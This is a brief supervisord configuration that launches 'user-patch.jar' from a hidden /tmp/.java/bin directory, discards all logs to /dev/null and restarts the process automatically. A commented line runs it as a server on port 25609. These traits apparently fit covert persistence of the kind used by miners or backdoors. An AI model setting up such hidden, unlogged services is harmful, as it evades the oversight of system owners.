[supervisord]
logfile=/dev/null

[program:app]
# command=./user-patch.jar server -p 25609 --s
directory=/tmp/.java/bin
command=./user-patch.jar -c ./conf.json
stdout_logfile=/dev/null
autorestart = true